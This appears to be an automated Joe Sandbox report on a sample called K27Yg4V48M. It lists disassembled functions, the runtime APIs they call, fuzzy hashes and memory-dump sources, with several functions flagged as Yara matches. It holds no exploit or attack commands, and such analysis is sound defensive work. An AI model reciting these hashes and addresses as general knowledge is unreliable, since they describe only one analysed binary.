                                                                                                    • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                    • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                    • _free.LIBCMT ref: 00431F11
                                                                                                    • _free.LIBCMT ref: 00431F39
                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID: Gg
                                                                                                    • API String ID: 3170660625-2883760843
                                                                                                    • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                    • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                                                                    • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                    • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,0212A9EC,?,00000000,?,0212CDE6,0210247E,00000000,?,00451F20), ref: 02132145
                                                                                                    • _free.LIBCMT ref: 02132178
                                                                                                    • _free.LIBCMT ref: 021321A0
                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321AD
                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321B9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID: Gg
                                                                                                    • API String ID: 3170660625-2883760843
                                                                                                    • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                    • Instruction ID: e4ca0bf4cfe5fbf257d2dd9b6bca70c1cf51bc79472203ed13996e95222b63ec
                                                                                                    • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                    • Instruction Fuzzy Hash: 99F031356C56003FD6173728AD49B5A266B9BC2F62B250124FD1892290EBB189168569
                                                                                                    APIs
                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02110DA0,?,?,?,00000000), ref: 02112667
                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02110DA0,?,?,?,00000000), ref: 0211266D
                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02110DA0,?,?,?,00000000), ref: 0211269A
                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02110DA0,?,?,?,00000000), ref: 021126A4
                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02110DA0,?,?,?,00000000), ref: 021126B6
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021126CC
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 021126DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                    • String ID:
                                                                                                    • API String ID: 4227777306-0
                                                                                                    • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                    • Instruction ID: 7c91d203102e9e54898be321cc308f44181e1fee949a5c90f8757bfeef2a2c9a
                                                                                                    • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                    • Instruction Fuzzy Hash: F501A735681125ABD724BF65EC48FAF3769AF42B52B504435FC15D30E0EB34D904CAE8
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0211670B), ref: 021124B6
                                                                                                    • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021124C4
                                                                                                    • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021124D2
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0211670B), ref: 02112500
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02112507
                                                                                                    • GetLastError.KERNEL32(?,?,?,0211670B), ref: 02112522
                                                                                                    • GetLastError.KERNEL32(?,?,?,0211670B), ref: 0211252E
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02112544
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02112552
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                    • String ID: kernel32.dll
                                                                                                    • API String ID: 4179531150-1793498882
                                                                                                    • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                    • Instruction ID: 3729434c5917f1ca793cd69da480609b69ff14d9bda4f379583f206f6ea1d96e
                                                                                                    • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                    • Instruction Fuzzy Hash: A0F0AF7A9403207FF7113B79BC9995B3FEDDD4AA633200636F811E22D1EB75C9018A68
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw
                                                                                                    • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                    • API String ID: 2005118841-3619870194
                                                                                                    • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                    • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                                                                    • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                    • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00431748
                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                    • _free.LIBCMT ref: 0043175A
                                                                                                    • _free.LIBCMT ref: 0043176D
                                                                                                    • _free.LIBCMT ref: 0043177E
                                                                                                    • _free.LIBCMT ref: 0043178F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID: (Sd
                                                                                                    • API String ID: 776569668-307651996
                                                                                                    • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                    • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                                                                    • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                    • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 021319AF
                                                                                                      • Part of subcall function 021336D1: HeapFree.KERNEL32(00000000,00000000,?,0213A35F,?,00000000,?,00000000,?,0213A603,?,00000007,?,?,0213A9F7,?), ref: 021336E7
                                                                                                      • Part of subcall function 021336D1: GetLastError.KERNEL32(?,?,0213A35F,?,00000000,?,00000000,?,0213A603,?,00000007,?,?,0213A9F7,?,?), ref: 021336F9
                                                                                                    • _free.LIBCMT ref: 021319C1
                                                                                                    • _free.LIBCMT ref: 021319D4
                                                                                                    • _free.LIBCMT ref: 021319E5
                                                                                                    • _free.LIBCMT ref: 021319F6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID: (Sd
                                                                                                    • API String ID: 776569668-307651996
                                                                                                    • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                    • Instruction ID: 057c258ef4d5b97b226876c4296515c312a96ed0f0c90ea11dc740adf02e335a
                                                                                                    • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                    • Instruction Fuzzy Hash: 8FF030B0D40310AF9F626F14AC844043B62AF0972270002A6F416977B2C774D9A2DFCE
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                                                                    • _free.LIBCMT ref: 004311DD
                                                                                                    • _free.LIBCMT ref: 004311F6
                                                                                                    • _free.LIBCMT ref: 00431228
                                                                                                    • _free.LIBCMT ref: 00431231
                                                                                                    • _free.LIBCMT ref: 0043123D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast$_memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275183328-0
                                                                                                    • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                    • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                                                                    • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                    • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,021325EC,00000001,00000001,?), ref: 021323F5
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,021325EC,00000001,00000001,?,?,?,?), ref: 0213247B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02132575
                                                                                                    • __freea.LIBCMT ref: 02132582
                                                                                                      • Part of subcall function 0213390E: RtlAllocateHeap.NTDLL(00000000,0210DAD7,00000000), ref: 02133940
                                                                                                    • __freea.LIBCMT ref: 0213258B
                                                                                                    • __freea.LIBCMT ref: 021325B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: 089065164f7acbcee2a009b1ab595d824f5b463daa05b22f9118c45ebaa118bc
                                                                                                    • Instruction ID: 66a0083c762da1175eb45fd8948056b9a1561d34ddeebf57a17db3141443342f
                                                                                                    • Opcode Fuzzy Hash: 089065164f7acbcee2a009b1ab595d824f5b463daa05b22f9118c45ebaa118bc
                                                                                                    • Instruction Fuzzy Hash: A951E273A80216AFDB26AF64CC61EEF7BABEB44754F154628FC04D6150DBB4DE40CA90
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __cftoe
                                                                                                    • String ID:
                                                                                                    • API String ID: 4189289331-0
                                                                                                    • Opcode ID: 6290ddc8ebea7097b1647a61380f344cd02ada4a64146fe838c0f2f7cf2ccb9a
                                                                                                    • Instruction ID: 2be2404fbb7b5422f65a927137c8501fe20f846d2abfd4dd51f740c24098e568
                                                                                                    • Opcode Fuzzy Hash: 6290ddc8ebea7097b1647a61380f344cd02ada4a64146fe838c0f2f7cf2ccb9a
                                                                                                    • Instruction Fuzzy Hash: 93513C36980215AFDF259F68CC44FAE77AEEF4C334F144269F815D6181EB31E528CAA4
                                                                                                    APIs
                                                                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02123051
                                                                                                      • Part of subcall function 02118AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02118ABD
                                                                                                    • SafeSQueue.LIBCONCRT ref: 0212306A
                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 0212312A
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0212314B
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02123159
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                    • String ID:
                                                                                                    • API String ID: 3496964030-0
                                                                                                    • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                    • Instruction ID: fbb9573a31d242bbee596e87ead30769e3e43f15987324fc35593b57cd42f757
                                                                                                    • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                    • Instruction Fuzzy Hash: EF311531A406259FCB29EF64C844B6AB7B1FF44710F1185A9EC168B291DB74E859CFD0
                                                                                                    APIs
                                                                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 02128F77
                                                                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 02128F90
                                                                                                    • FindVITargetTypeInstance.LIBVCRUNTIME ref: 02128F97
                                                                                                    • PMDtoOffset.LIBCMT ref: 02128FB6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FindInstanceTargetType$Offset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1467055271-0
                                                                                                    • Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                    • Instruction ID: 65aab9d561166828f0e89d0156b5ff9d1edbbe73f3418b7e242d19d81ba683dc
                                                                                                    • Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                    • Instruction Fuzzy Hash: D7213B72A842289FDF18DF68DC45E6D77A6EF44750F21822AF91093180D731E929CAB4
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                    • String ID:
                                                                                                    • API String ID: 1687354797-0
                                                                                                    • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                    • Instruction ID: eb260ce56c48c4d81a716e6d7e3b15367dbc604551a7fc5368cf219b14c58163
                                                                                                    • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                    • Instruction Fuzzy Hash: 07215171C84208AEDF15EBE4A884BDEB7BAAF09325F54401AE404B71C0DBB899448E65
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,604C2B90), ref: 00428DE8
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                                                                    • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,604C2B90), ref: 00428E61
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                    • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                                                                    • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                    • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,02129038,021269C9,02140907,00000008,02140C6C,?,?,?,?,02123CB2,?,?,0045A064), ref: 0212904F
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0212905D
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02129076
                                                                                                    • SetLastError.KERNEL32(00000000,?,02129038,021269C9,02140907,00000008,02140C6C,?,?,?,?,02123CB2,?,?,0045A064), ref: 021290C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                    • Instruction ID: ad76ffede91f76d53e3f975ef702077c023d8977f7041d8bd07d0d1eb6bca67e
                                                                                                    • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                    • Instruction Fuzzy Hash: 0C01FC322897356EA72827B8AC88A672749EF05775F300339F520452E0FF12983C499D
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                                                    • int.LIBCPMT ref: 00404D7A
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                    • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                                                                    • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                    • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 02104FCA
                                                                                                    • int.LIBCPMT ref: 02104FE1
                                                                                                      • Part of subcall function 0210BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0210BFD4
                                                                                                      • Part of subcall function 0210BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0210BFEE
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 02104FEA
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0210501B
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 02105031
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0210504F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                    • Instruction ID: e5d59f1a220bc87e68fff1f0523d661065e86fdccc4274a307ec6c862bc4584b
                                                                                                    • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                    • Instruction Fuzzy Hash: A411C231D842189FCB25EBA4C880AAE7776BF04354F544519E4116B2D0DBB49A05CFD4
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                                                    • int.LIBCPMT ref: 0040C1B1
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                    • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                                                                    • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                    • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                                                                    • int.LIBCPMT ref: 004054FA
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00405534
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2243866535-0
                                                                                                    • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                    • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                                                                    • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                    • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                    • int.LIBCPMT ref: 00404C3C
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
